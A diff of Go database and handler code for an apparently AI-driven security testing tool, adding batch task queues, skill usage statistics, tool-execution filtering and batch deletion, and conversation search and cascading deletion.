_, err := db.Exec(
|
||||
"DELETE FROM batch_tasks WHERE queue_id = ? AND id = ?",
|
||||
queueID, taskID,
|
||||
)
|
||||
if err != nil {
|
||||
return fmt.Errorf("删除批量任务失败: %w", err)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// DeleteBatchQueue 删除批量任务队列
|
||||
func (db *DB) DeleteBatchQueue(queueID string) error {
|
||||
tx, err := db.Begin()
|
||||
if err != nil {
|
||||
return fmt.Errorf("开始事务失败: %w", err)
|
||||
}
|
||||
defer tx.Rollback()
|
||||
|
||||
// 删除任务(外键会自动级联删除)
|
||||
_, err = tx.Exec("DELETE FROM batch_tasks WHERE queue_id = ?", queueID)
|
||||
if err != nil {
|
||||
return fmt.Errorf("删除批量任务失败: %w", err)
|
||||
}
|
||||
|
||||
// 删除队列
|
||||
_, err = tx.Exec("DELETE FROM batch_task_queues WHERE id = ?", queueID)
|
||||
if err != nil {
|
||||
return fmt.Errorf("删除批量任务队列失败: %w", err)
|
||||
}
|
||||
|
||||
return tx.Commit()
|
||||
}
|
||||
|
||||
@@ -223,12 +223,30 @@ func (db *DB) UpdateConversationTime(id string) error {
|
||||
return nil
|
||||
}
|
||||
|
||||
// DeleteConversation 删除对话
|
||||
// DeleteConversation 删除对话及其所有相关数据
|
||||
// 由于数据库外键约束设置了 ON DELETE CASCADE,删除对话时会自动删除:
|
||||
// - messages(消息)
|
||||
// - process_details(过程详情)
|
||||
// - attack_chain_nodes(攻击链节点)
|
||||
// - attack_chain_edges(攻击链边)
|
||||
// - vulnerabilities(漏洞)
|
||||
// - conversation_group_mappings(分组映射)
|
||||
// 注意:knowledge_retrieval_logs 使用 ON DELETE SET NULL,记录会保留但 conversation_id 会被设为 NULL
|
||||
func (db *DB) DeleteConversation(id string) error {
|
||||
_, err := db.Exec("DELETE FROM conversations WHERE id = ?", id)
|
||||
// 显式删除知识检索日志(虽然外键是SET NULL,但为了彻底清理,我们手动删除)
|
||||
_, err := db.Exec("DELETE FROM knowledge_retrieval_logs WHERE conversation_id = ?", id)
|
||||
if err != nil {
|
||||
db.logger.Warn("删除知识检索日志失败", zap.String("conversationId", id), zap.Error(err))
|
||||
// 不返回错误,继续删除对话
|
||||
}
|
||||
|
||||
// 删除对话(外键CASCADE会自动删除其他相关数据)
|
||||
_, err = db.Exec("DELETE FROM conversations WHERE id = ?", id)
|
||||
if err != nil {
|
||||
return fmt.Errorf("删除对话失败: %w", err)
|
||||
}
|
||||
|
||||
db.logger.Info("对话及其所有相关数据已删除", zap.String("conversationId", id))
|
||||
return nil
|
||||
}
|
||||
|
||||
|
||||
@@ -104,6 +104,17 @@ func (db *DB) initTables() error {
|
||||
updated_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP
|
||||
);`
|
||||
|
||||
// 创建Skills统计表
|
||||
createSkillStatsTable := `
|
||||
CREATE TABLE IF NOT EXISTS skill_stats (
|
||||
skill_name TEXT PRIMARY KEY,
|
||||
total_calls INTEGER NOT NULL DEFAULT 0,
|
||||
success_calls INTEGER NOT NULL DEFAULT 0,
|
||||
failed_calls INTEGER NOT NULL DEFAULT 0,
|
||||
last_call_time DATETIME,
|
||||
updated_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP
|
||||
);`
|
||||
|
||||
// 创建攻击链节点表
|
||||
createAttackChainNodesTable := `
|
||||
CREATE TABLE IF NOT EXISTS attack_chain_nodes (
|
||||
@@ -189,6 +200,33 @@ func (db *DB) initTables() error {
|
||||
FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE CASCADE
|
||||
);`
|
||||
|
||||
// 创建批量任务队列表
|
||||
createBatchTaskQueuesTable := `
|
||||
CREATE TABLE IF NOT EXISTS batch_task_queues (
|
||||
id TEXT PRIMARY KEY,
|
||||
title TEXT,
|
||||
status TEXT NOT NULL,
|
||||
created_at DATETIME NOT NULL,
|
||||
started_at DATETIME,
|
||||
completed_at DATETIME,
|
||||
current_index INTEGER NOT NULL DEFAULT 0
|
||||
);`
|
||||
|
||||
// 创建批量任务表
|
||||
createBatchTasksTable := `
|
||||
CREATE TABLE IF NOT EXISTS batch_tasks (
|
||||
id TEXT PRIMARY KEY,
|
||||
queue_id TEXT NOT NULL,
|
||||
message TEXT NOT NULL,
|
||||
conversation_id TEXT,
|
||||
status TEXT NOT NULL,
|
||||
started_at DATETIME,
|
||||
completed_at DATETIME,
|
||||
error TEXT,
|
||||
result TEXT,
|
||||
FOREIGN KEY (queue_id) REFERENCES batch_task_queues(id) ON DELETE CASCADE
|
||||
);`
|
||||
|
||||
// 创建索引
|
||||
createIndexes := `
|
||||
CREATE INDEX IF NOT EXISTS idx_messages_conversation_id ON messages(conversation_id);
|
||||
@@ -212,6 +250,9 @@ func (db *DB) initTables() error {
|
||||
CREATE INDEX IF NOT EXISTS idx_vulnerabilities_severity ON vulnerabilities(severity);
|
||||
CREATE INDEX IF NOT EXISTS idx_vulnerabilities_status ON vulnerabilities(status);
|
||||
CREATE INDEX IF NOT EXISTS idx_vulnerabilities_created_at ON vulnerabilities(created_at);
|
||||
CREATE INDEX IF NOT EXISTS idx_batch_tasks_queue_id ON batch_tasks(queue_id);
|
||||
CREATE INDEX IF NOT EXISTS idx_batch_task_queues_created_at ON batch_task_queues(created_at);
|
||||
CREATE INDEX IF NOT EXISTS idx_batch_task_queues_title ON batch_task_queues(title);
|
||||
`
|
||||
|
||||
if _, err := db.Exec(createConversationsTable); err != nil {
|
||||
@@ -234,6 +275,10 @@ func (db *DB) initTables() error {
|
||||
return fmt.Errorf("创建tool_stats表失败: %w", err)
|
||||
}
|
||||
|
||||
if _, err := db.Exec(createSkillStatsTable); err != nil {
|
||||
return fmt.Errorf("创建skill_stats表失败: %w", err)
|
||||
}
|
||||
|
||||
if _, err := db.Exec(createAttackChainNodesTable); err != nil {
|
||||
return fmt.Errorf("创建attack_chain_nodes表失败: %w", err)
|
||||
}
|
||||
@@ -258,6 +303,14 @@ func (db *DB) initTables() error {
|
||||
return fmt.Errorf("创建vulnerabilities表失败: %w", err)
|
||||
}
|
||||
|
||||
if _, err := db.Exec(createBatchTaskQueuesTable); err != nil {
|
||||
return fmt.Errorf("创建batch_task_queues表失败: %w", err)
|
||||
}
|
||||
|
||||
if _, err := db.Exec(createBatchTasksTable); err != nil {
|
||||
return fmt.Errorf("创建batch_tasks表失败: %w", err)
|
||||
}
|
||||
|
||||
// 为已有表添加新字段(如果不存在)- 必须在创建索引之前
|
||||
if err := db.migrateConversationsTable(); err != nil {
|
||||
db.logger.Warn("迁移conversations表失败", zap.Error(err))
|
||||
@@ -274,6 +327,11 @@ func (db *DB) initTables() error {
|
||||
// 不返回错误,允许继续运行
|
||||
}
|
||||
|
||||
if err := db.migrateBatchTaskQueuesTable(); err != nil {
|
||||
db.logger.Warn("迁移batch_task_queues表失败", zap.Error(err))
|
||||
// 不返回错误,允许继续运行
|
||||
}
|
||||
|
||||
if _, err := db.Exec(createIndexes); err != nil {
|
||||
return fmt.Errorf("创建索引失败: %w", err)
|
||||
}
|
||||
@@ -390,6 +448,49 @@ func (db *DB) migrateConversationGroupMappingsTable() error {
|
||||
return nil
|
||||
}
|
||||
|
||||
// migrateBatchTaskQueuesTable 迁移batch_task_queues表,添加title和role字段
|
||||
func (db *DB) migrateBatchTaskQueuesTable() error {
|
||||
// 检查title字段是否存在
|
||||
var count int
|
||||
err := db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('batch_task_queues') WHERE name='title'").Scan(&count)
|
||||
if err != nil {
|
||||
// 如果查询失败,尝试添加字段
|
||||
if _, addErr := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN title TEXT"); addErr != nil {
|
||||
// 如果字段已存在,忽略错误
|
||||
errMsg := strings.ToLower(addErr.Error())
|
||||
if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") {
|
||||
db.logger.Warn("添加title字段失败", zap.Error(addErr))
|
||||
}
|
||||
}
|
||||
} else if count == 0 {
|
||||
// 字段不存在,添加它
|
||||
if _, err := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN title TEXT"); err != nil {
|
||||
db.logger.Warn("添加title字段失败", zap.Error(err))
|
||||
}
|
||||
}
|
||||
|
||||
// 检查role字段是否存在
|
||||
var roleCount int
|
||||
err = db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('batch_task_queues') WHERE name='role'").Scan(&roleCount)
|
||||
if err != nil {
|
||||
// 如果查询失败,尝试添加字段
|
||||
if _, addErr := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN role TEXT"); addErr != nil {
|
||||
// 如果字段已存在,忽略错误
|
||||
errMsg := strings.ToLower(addErr.Error())
|
||||
if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") {
|
||||
db.logger.Warn("添加role字段失败", zap.Error(addErr))
|
||||
}
|
||||
}
|
||||
} else if roleCount == 0 {
|
||||
// 字段不存在,添加它
|
||||
if _, err := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN role TEXT"); err != nil {
|
||||
db.logger.Warn("添加role字段失败", zap.Error(err))
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// NewKnowledgeDB 创建知识库数据库连接(只包含知识库相关的表)
|
||||
func NewKnowledgeDB(dbPath string, logger *zap.Logger) (*DB, error) {
|
||||
sqlDB, err := sql.Open("sqlite3", dbPath+"?_journal_mode=WAL&_foreign_keys=1")
|
||||
|
||||
@@ -205,7 +205,7 @@ func (db *DB) AddConversationToGroup(conversationID, groupID string) error {
|
||||
if err != nil {
|
||||
return fmt.Errorf("删除对话旧分组关联失败: %w", err)
|
||||
}
|
||||
|
||||
|
||||
// 然后插入新的分组关联
|
||||
id := uuid.New().String()
|
||||
_, err = db.Exec(
|
||||
@@ -282,6 +282,78 @@ func (db *DB) GetConversationsByGroup(groupID string) ([]*Conversation, error) {
|
||||
return conversations, nil
|
||||
}
|
||||
|
||||
// SearchConversationsByGroup 搜索分组中的对话(按标题和消息内容模糊匹配)
|
||||
func (db *DB) SearchConversationsByGroup(groupID string, searchQuery string) ([]*Conversation, error) {
|
||||
// 构建SQL查询,支持按标题和消息内容搜索
|
||||
// 使用 DISTINCT 避免因为一个对话有多条匹配消息而重复
|
||||
query := `SELECT DISTINCT c.id, c.title, COALESCE(c.pinned, 0), c.created_at, c.updated_at, COALESCE(cgm.pinned, 0) as group_pinned
|
||||
FROM conversations c
|
||||
INNER JOIN conversation_group_mappings cgm ON c.id = cgm.conversation_id
|
||||
WHERE cgm.group_id = ?`
|
||||
|
||||
args := []interface{}{groupID}
|
||||
|
||||
// 如果有搜索关键词,添加标题和消息内容搜索条件
|
||||
if searchQuery != "" {
|
||||
searchPattern := "%" + searchQuery + "%"
|
||||
// 搜索标题或消息内容
|
||||
// 使用 LEFT JOIN 连接消息表,这样即使没有消息的对话也能被搜索到(通过标题)
|
||||
query += ` AND (
|
||||
LOWER(c.title) LIKE LOWER(?)
|
||||
OR EXISTS (
|
||||
SELECT 1 FROM messages m
|
||||
WHERE m.conversation_id = c.id
|
||||
AND LOWER(m.content) LIKE LOWER(?)
|
||||
)
|
||||
)`
|
||||
args = append(args, searchPattern, searchPattern)
|
||||
}
|
||||
|
||||
query += " ORDER BY COALESCE(cgm.pinned, 0) DESC, c.updated_at DESC"
|
||||
|
||||
rows, err := db.Query(query, args...)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("搜索分组对话失败: %w", err)
|
||||
}
|
||||
defer rows.Close()
|
||||
|
||||
var conversations []*Conversation
|
||||
for rows.Next() {
|
||||
var conv Conversation
|
||||
var createdAt, updatedAt string
|
||||
var pinned int
|
||||
var groupPinned int
|
||||
|
||||
if err := rows.Scan(&conv.ID, &conv.Title, &pinned, &createdAt, &updatedAt, &groupPinned); err != nil {
|
||||
return nil, fmt.Errorf("扫描对话失败: %w", err)
|
||||
}
|
||||
|
||||
// 尝试多种时间格式解析
|
||||
var err1, err2 error
|
||||
conv.CreatedAt, err1 = time.Parse("2006-01-02 15:04:05.999999999-07:00", createdAt)
|
||||
if err1 != nil {
|
||||
conv.CreatedAt, err1 = time.Parse("2006-01-02 15:04:05", createdAt)
|
||||
}
|
||||
if err1 != nil {
|
||||
conv.CreatedAt, _ = time.Parse(time.RFC3339, createdAt)
|
||||
}
|
||||
|
||||
conv.UpdatedAt, err2 = time.Parse("2006-01-02 15:04:05.999999999-07:00", updatedAt)
|
||||
if err2 != nil {
|
||||
conv.UpdatedAt, err2 = time.Parse("2006-01-02 15:04:05", updatedAt)
|
||||
}
|
||||
if err2 != nil {
|
||||
conv.UpdatedAt, _ = time.Parse(time.RFC3339, updatedAt)
|
||||
}
|
||||
|
||||
conv.Pinned = pinned != 0
|
||||
|
||||
conversations = append(conversations, &conv)
|
||||
}
|
||||
|
||||
return conversations, nil
|
||||
}
|
||||
|
||||
// GetGroupByConversation 获取对话所属的分组
|
||||
func (db *DB) GetGroupByConversation(conversationID string) (string, error) {
|
||||
var groupID string
|
||||
|
||||
@@ -3,9 +3,11 @@ package database
|
||||
import (
|
||||
"database/sql"
|
||||
"encoding/json"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/mcp"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
@@ -70,13 +72,25 @@ func (db *DB) SaveToolExecution(exec *mcp.ToolExecution) error {
|
||||
}
|
||||
|
||||
// CountToolExecutions 统计工具执行记录总数
|
||||
func (db *DB) CountToolExecutions(status string) (int, error) {
|
||||
func (db *DB) CountToolExecutions(status, toolName string) (int, error) {
|
||||
query := `SELECT COUNT(*) FROM tool_executions`
|
||||
args := []interface{}{}
|
||||
conditions := []string{}
|
||||
if status != "" {
|
||||
query += ` WHERE status = ?`
|
||||
conditions = append(conditions, "status = ?")
|
||||
args = append(args, status)
|
||||
}
|
||||
if toolName != "" {
|
||||
// 支持部分匹配(模糊搜索),不区分大小写
|
||||
conditions = append(conditions, "LOWER(tool_name) LIKE ?")
|
||||
args = append(args, "%"+strings.ToLower(toolName)+"%")
|
||||
}
|
||||
if len(conditions) > 0 {
|
||||
query += ` WHERE ` + conditions[0]
|
||||
for i := 1; i < len(conditions); i++ {
|
||||
query += ` AND ` + conditions[i]
|
||||
}
|
||||
}
|
||||
var count int
|
||||
err := db.QueryRow(query, args...).Scan(&count)
|
||||
if err != nil {
|
||||
@@ -87,30 +101,43 @@ func (db *DB) CountToolExecutions(status string) (int, error) {
|
||||
|
||||
// LoadToolExecutions 加载所有工具执行记录(支持分页)
|
||||
func (db *DB) LoadToolExecutions() ([]*mcp.ToolExecution, error) {
|
||||
return db.LoadToolExecutionsWithPagination(0, 1000, "")
|
||||
return db.LoadToolExecutionsWithPagination(0, 1000, "", "")
|
||||
}
|
||||
|
||||
// LoadToolExecutionsWithPagination 分页加载工具执行记录
|
||||
// limit: 最大返回记录数,0 表示使用默认值 1000
|
||||
// offset: 跳过的记录数,用于分页
|
||||
// status: 状态筛选,空字符串表示不过滤
|
||||
func (db *DB) LoadToolExecutionsWithPagination(offset, limit int, status string) ([]*mcp.ToolExecution, error) {
|
||||
// toolName: 工具名称筛选,空字符串表示不过滤
|
||||
func (db *DB) LoadToolExecutionsWithPagination(offset, limit int, status, toolName string) ([]*mcp.ToolExecution, error) {
|
||||
if limit <= 0 {
|
||||
limit = 1000 // 默认限制
|
||||
}
|
||||
if limit > 10000 {
|
||||
limit = 10000 // 最大限制,防止一次性加载过多数据
|
||||
}
|
||||
|
||||
|
||||
query := `
|
||||
SELECT id, tool_name, arguments, status, result, error, start_time, end_time, duration_ms
|
||||
FROM tool_executions
|
||||
`
|
||||
args := []interface{}{}
|
||||
conditions := []string{}
|
||||
if status != "" {
|
||||
query += ` WHERE status = ?`
|
||||
conditions = append(conditions, "status = ?")
|
||||
args = append(args, status)
|
||||
}
|
||||
if toolName != "" {
|
||||
// 支持部分匹配(模糊搜索),不区分大小写
|
||||
conditions = append(conditions, "LOWER(tool_name) LIKE ?")
|
||||
args = append(args, "%"+strings.ToLower(toolName)+"%")
|
||||
}
|
||||
if len(conditions) > 0 {
|
||||
query += ` WHERE ` + conditions[0]
|
||||
for i := 1; i < len(conditions); i++ {
|
||||
query += ` AND ` + conditions[i]
|
||||
}
|
||||
}
|
||||
query += ` ORDER BY start_time DESC LIMIT ? OFFSET ?`
|
||||
args = append(args, limit, offset)
|
||||
|
||||
@@ -254,6 +281,117 @@ func (db *DB) DeleteToolExecution(id string) error {
|
||||
return nil
|
||||
}
|
||||
|
||||
// DeleteToolExecutions 批量删除工具执行记录
|
||||
func (db *DB) DeleteToolExecutions(ids []string) error {
|
||||
if len(ids) == 0 {
|
||||
return nil
|
||||
}
|
||||
|
||||
// 构建 IN 查询的占位符
|
||||
placeholders := make([]string, len(ids))
|
||||
args := make([]interface{}, len(ids))
|
||||
for i, id := range ids {
|
||||
placeholders[i] = "?"
|
||||
args[i] = id
|
||||
}
|
||||
|
||||
query := `DELETE FROM tool_executions WHERE id IN (` + strings.Join(placeholders, ",") + `)`
|
||||
_, err := db.Exec(query, args...)
|
||||
if err != nil {
|
||||
db.logger.Error("批量删除工具执行记录失败", zap.Error(err), zap.Int("count", len(ids)))
|
||||
return err
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// GetToolExecutionsByIds 根据ID列表获取工具执行记录(用于批量删除前获取统计信息)
|
||||
func (db *DB) GetToolExecutionsByIds(ids []string) ([]*mcp.ToolExecution, error) {
|
||||
if len(ids) == 0 {
|
||||
return []*mcp.ToolExecution{}, nil
|
||||
}
|
||||
|
||||
// 构建 IN 查询的占位符
|
||||
placeholders := make([]string, len(ids))
|
||||
args := make([]interface{}, len(ids))
|
||||
for i, id := range ids {
|
||||
placeholders[i] = "?"
|
||||
args[i] = id
|
||||
}
|
||||
|
||||
query := `
|
||||
SELECT id, tool_name, arguments, status, result, error, start_time, end_time, duration_ms
|
||||
FROM tool_executions
|
||||
WHERE id IN (` + strings.Join(placeholders, ",") + `)
|
||||
`
|
||||
|
||||
rows, err := db.Query(query, args...)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
defer rows.Close()
|
||||
|
||||
var executions []*mcp.ToolExecution
|
||||
for rows.Next() {
|
||||
var exec mcp.ToolExecution
|
||||
var argsJSON string
|
||||
var resultJSON sql.NullString
|
||||
var errorText sql.NullString
|
||||
var endTime sql.NullTime
|
||||
var durationMs sql.NullInt64
|
||||
|
||||
err := rows.Scan(
|
||||
&exec.ID,
|
||||
&exec.ToolName,
|
||||
&argsJSON,
|
||||
&exec.Status,
|
||||
&resultJSON,
|
||||
&errorText,
|
||||
&exec.StartTime,
|
||||
&endTime,
|
||||
&durationMs,
|
||||
)
|
||||
if err != nil {
|
||||
db.logger.Warn("加载执行记录失败", zap.Error(err))
|
||||
continue
|
||||
}
|
||||
|
||||
// 解析参数
|
||||
if err := json.Unmarshal([]byte(argsJSON), &exec.Arguments); err != nil {
|
||||
db.logger.Warn("解析执行参数失败", zap.Error(err))
|
||||
exec.Arguments = make(map[string]interface{})
|
||||
}
|
||||
|
||||
// 解析结果
|
||||
if resultJSON.Valid && resultJSON.String != "" {
|
||||
var result mcp.ToolResult
|
||||
if err := json.Unmarshal([]byte(resultJSON.String), &result); err != nil {
|
||||
db.logger.Warn("解析执行结果失败", zap.Error(err))
|
||||
} else {
|
||||
exec.Result = &result
|
||||
}
|
||||
}
|
||||
|
||||
// 设置错误
|
||||
if errorText.Valid {
|
||||
exec.Error = errorText.String
|
||||
}
|
||||
|
||||
// 设置结束时间
|
||||
if endTime.Valid {
|
||||
exec.EndTime = &endTime.Time
|
||||
}
|
||||
|
||||
// 设置持续时间
|
||||
if durationMs.Valid {
|
||||
exec.Duration = time.Duration(durationMs.Int64) * time.Millisecond
|
||||
}
|
||||
|
||||
executions = append(executions, &exec)
|
||||
}
|
||||
|
||||
return executions, nil
|
||||
}
|
||||
|
||||
// SaveToolStats 保存工具统计信息
|
||||
func (db *DB) SaveToolStats(toolName string, stats *mcp.ToolStats) error {
|
||||
var lastCallTime sql.NullTime
|
||||
|
||||
@@ -0,0 +1,142 @@
|
||||
package database
|
||||
|
||||
import (
|
||||
"database/sql"
|
||||
"time"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// SkillStats Skills统计信息
|
||||
type SkillStats struct {
|
||||
SkillName string
|
||||
TotalCalls int
|
||||
SuccessCalls int
|
||||
FailedCalls int
|
||||
LastCallTime *time.Time
|
||||
}
|
||||
|
||||
// SaveSkillStats 保存Skills统计信息
|
||||
func (db *DB) SaveSkillStats(skillName string, stats *SkillStats) error {
|
||||
var lastCallTime sql.NullTime
|
||||
if stats.LastCallTime != nil {
|
||||
lastCallTime = sql.NullTime{Time: *stats.LastCallTime, Valid: true}
|
||||
}
|
||||
|
||||
query := `
|
||||
INSERT OR REPLACE INTO skill_stats
|
||||
(skill_name, total_calls, success_calls, failed_calls, last_call_time, updated_at)
|
||||
VALUES (?, ?, ?, ?, ?, ?)
|
||||
`
|
||||
|
||||
_, err := db.Exec(query,
|
||||
skillName,
|
||||
stats.TotalCalls,
|
||||
stats.SuccessCalls,
|
||||
stats.FailedCalls,
|
||||
lastCallTime,
|
||||
time.Now(),
|
||||
)
|
||||
|
||||
if err != nil {
|
||||
db.logger.Error("保存Skills统计信息失败", zap.Error(err), zap.String("skillName", skillName))
|
||||
return err
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// LoadSkillStats 加载所有Skills统计信息
|
||||
func (db *DB) LoadSkillStats() (map[string]*SkillStats, error) {
|
||||
query := `
|
||||
SELECT skill_name, total_calls, success_calls, failed_calls, last_call_time
|
||||
FROM skill_stats
|
||||
`
|
||||
|
||||
rows, err := db.Query(query)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
defer rows.Close()
|
||||
|
||||
stats := make(map[string]*SkillStats)
|
||||
for rows.Next() {
|
||||
var stat SkillStats
|
||||
var lastCallTime sql.NullTime
|
||||
|
||||
err := rows.Scan(
|
||||
&stat.SkillName,
|
||||
&stat.TotalCalls,
|
||||
&stat.SuccessCalls,
|
||||
&stat.FailedCalls,
|
||||
&lastCallTime,
|
||||
)
|
||||
if err != nil {
|
||||
db.logger.Warn("加载Skills统计信息失败", zap.Error(err))
|
||||
continue
|
||||
}
|
||||
|
||||
if lastCallTime.Valid {
|
||||
stat.LastCallTime = &lastCallTime.Time
|
||||
}
|
||||
|
||||
stats[stat.SkillName] = &stat
|
||||
}
|
||||
|
||||
return stats, nil
|
||||
}
|
||||
|
||||
// UpdateSkillStats 更新Skills统计信息(累加模式)
|
||||
func (db *DB) UpdateSkillStats(skillName string, totalCalls, successCalls, failedCalls int, lastCallTime *time.Time) error {
|
||||
var lastCallTimeSQL sql.NullTime
|
||||
if lastCallTime != nil {
|
||||
lastCallTimeSQL = sql.NullTime{Time: *lastCallTime, Valid: true}
|
||||
}
|
||||
|
||||
query := `
|
||||
INSERT INTO skill_stats (skill_name, total_calls, success_calls, failed_calls, last_call_time, updated_at)
|
||||
VALUES (?, ?, ?, ?, ?, ?)
|
||||
ON CONFLICT(skill_name) DO UPDATE SET
|
||||
total_calls = total_calls + ?,
|
||||
success_calls = success_calls + ?,
|
||||
failed_calls = failed_calls + ?,
|
||||
last_call_time = COALESCE(?, last_call_time),
|
||||
updated_at = ?
|
||||
`
|
||||
|
||||
_, err := db.Exec(query,
|
||||
skillName, totalCalls, successCalls, failedCalls, lastCallTimeSQL, time.Now(),
|
||||
totalCalls, successCalls, failedCalls, lastCallTimeSQL, time.Now(),
|
||||
)
|
||||
|
||||
if err != nil {
|
||||
db.logger.Error("更新Skills统计信息失败", zap.Error(err), zap.String("skillName", skillName))
|
||||
return err
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// ClearSkillStats 清空所有Skills统计信息
|
||||
func (db *DB) ClearSkillStats() error {
|
||||
query := `DELETE FROM skill_stats`
|
||||
_, err := db.Exec(query)
|
||||
if err != nil {
|
||||
db.logger.Error("清空Skills统计信息失败", zap.Error(err))
|
||||
return err
|
||||
}
|
||||
db.logger.Info("已清空所有Skills统计信息")
|
||||
return nil
|
||||
}
|
||||
|
||||
// ClearSkillStatsByName 清空指定skill的统计信息
|
||||
func (db *DB) ClearSkillStatsByName(skillName string) error {
|
||||
query := `DELETE FROM skill_stats WHERE skill_name = ?`
|
||||
_, err := db.Exec(query, skillName)
|
||||
if err != nil {
|
||||
db.logger.Error("清空指定skill统计信息失败", zap.Error(err), zap.String("skillName", skillName))
|
||||
return err
|
||||
}
|
||||
db.logger.Info("已清空指定skill统计信息", zap.String("skillName", skillName))
|
||||
return nil
|
||||
}
|
||||
@@ -0,0 +1,763 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"context"
|
||||
"crypto/rand"
|
||||
"encoding/hex"
|
||||
"fmt"
|
||||
"sort"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
)
|
||||
|
||||
// BatchTask 批量任务项
|
||||
type BatchTask struct {
|
||||
ID string `json:"id"`
|
||||
Message string `json:"message"`
|
||||
ConversationID string `json:"conversationId,omitempty"`
|
||||
Status string `json:"status"` // pending, running, completed, failed, cancelled
|
||||
StartedAt *time.Time `json:"startedAt,omitempty"`
|
||||
CompletedAt *time.Time `json:"completedAt,omitempty"`
|
||||
Error string `json:"error,omitempty"`
|
||||
Result string `json:"result,omitempty"`
|
||||
}
|
||||
|
||||
// BatchTaskQueue 批量任务队列
|
||||
type BatchTaskQueue struct {
|
||||
ID string `json:"id"`
|
||||
Title string `json:"title,omitempty"`
|
||||
Role string `json:"role,omitempty"` // 角色名称(空字符串表示默认角色)
|
||||
Tasks []*BatchTask `json:"tasks"`
|
||||
Status string `json:"status"` // pending, running, paused, completed, cancelled
|
||||
CreatedAt time.Time `json:"createdAt"`
|
||||
StartedAt *time.Time `json:"startedAt,omitempty"`
|
||||
CompletedAt *time.Time `json:"completedAt,omitempty"`
|
||||
CurrentIndex int `json:"currentIndex"`
|
||||
mu sync.RWMutex
|
||||
}
|
||||
|
||||
// BatchTaskManager 批量任务管理器
|
||||
type BatchTaskManager struct {
|
||||
db *database.DB
|
||||
queues map[string]*BatchTaskQueue
|
||||
taskCancels map[string]context.CancelFunc // 存储每个队列当前任务的取消函数
|
||||
mu sync.RWMutex
|
||||
}
|
||||
|
||||
// NewBatchTaskManager 创建批量任务管理器
|
||||
func NewBatchTaskManager() *BatchTaskManager {
|
||||
return &BatchTaskManager{
|
||||
queues: make(map[string]*BatchTaskQueue),
|
||||
taskCancels: make(map[string]context.CancelFunc),
|
||||
}
|
||||
}
|
||||
|
||||
// SetDB 设置数据库连接
|
||||
func (m *BatchTaskManager) SetDB(db *database.DB) {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
m.db = db
|
||||
}
|
||||
|
||||
// CreateBatchQueue 创建批量任务队列
|
||||
func (m *BatchTaskManager) CreateBatchQueue(title, role string, tasks []string) *BatchTaskQueue {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
|
||||
queueID := time.Now().Format("20060102150405") + "-" + generateShortID()
|
||||
queue := &BatchTaskQueue{
|
||||
ID: queueID,
|
||||
Title: title,
|
||||
Role: role,
|
||||
Tasks: make([]*BatchTask, 0, len(tasks)),
|
||||
Status: "pending",
|
||||
CreatedAt: time.Now(),
|
||||
CurrentIndex: 0,
|
||||
}
|
||||
|
||||
// 准备数据库保存的任务数据
|
||||
dbTasks := make([]map[string]interface{}, 0, len(tasks))
|
||||
|
||||
for _, message := range tasks {
|
||||
if message == "" {
|
||||
continue // 跳过空行
|
||||
}
|
||||
taskID := generateShortID()
|
||||
task := &BatchTask{
|
||||
ID: taskID,
|
||||
Message: message,
|
||||
Status: "pending",
|
||||
}
|
||||
queue.Tasks = append(queue.Tasks, task)
|
||||
dbTasks = append(dbTasks, map[string]interface{}{
|
||||
"id": taskID,
|
||||
"message": message,
|
||||
})
|
||||
}
|
||||
|
||||
// 保存到数据库
|
||||
if m.db != nil {
|
||||
if err := m.db.CreateBatchQueue(queueID, title, role, dbTasks); err != nil {
|
||||
// 如果数据库保存失败,记录错误但继续(使用内存缓存)
|
||||
// 这里可以添加日志记录
|
||||
}
|
||||
}
|
||||
|
||||
m.queues[queueID] = queue
|
||||
return queue
|
||||
}
|
||||
|
||||
// GetBatchQueue 获取批量任务队列
|
||||
func (m *BatchTaskManager) GetBatchQueue(queueID string) (*BatchTaskQueue, bool) {
|
||||
m.mu.RLock()
|
||||
queue, exists := m.queues[queueID]
|
||||
m.mu.RUnlock()
|
||||
|
||||
if exists {
|
||||
return queue, true
|
||||
}
|
||||
|
||||
// 如果内存中不存在,尝试从数据库加载
|
||||
if m.db != nil {
|
||||
if queue := m.loadQueueFromDB(queueID); queue != nil {
|
||||
m.mu.Lock()
|
||||
m.queues[queueID] = queue
|
||||
m.mu.Unlock()
|
||||
return queue, true
|
||||
}
|
||||
}
|
||||
|
||||
return nil, false
|
||||
}
|
||||
|
||||
// loadQueueFromDB 从数据库加载单个队列
|
||||
func (m *BatchTaskManager) loadQueueFromDB(queueID string) *BatchTaskQueue {
|
||||
if m.db == nil {
|
||||
return nil
|
||||
}
|
||||
|
||||
queueRow, err := m.db.GetBatchQueue(queueID)
|
||||
if err != nil || queueRow == nil {
|
||||
return nil
|
||||
}
|
||||
|
||||
taskRows, err := m.db.GetBatchTasks(queueID)
|
||||
if err != nil {
|
||||
return nil
|
||||
}
|
||||
|
||||
queue := &BatchTaskQueue{
|
||||
ID: queueRow.ID,
|
||||
Status: queueRow.Status,
|
||||
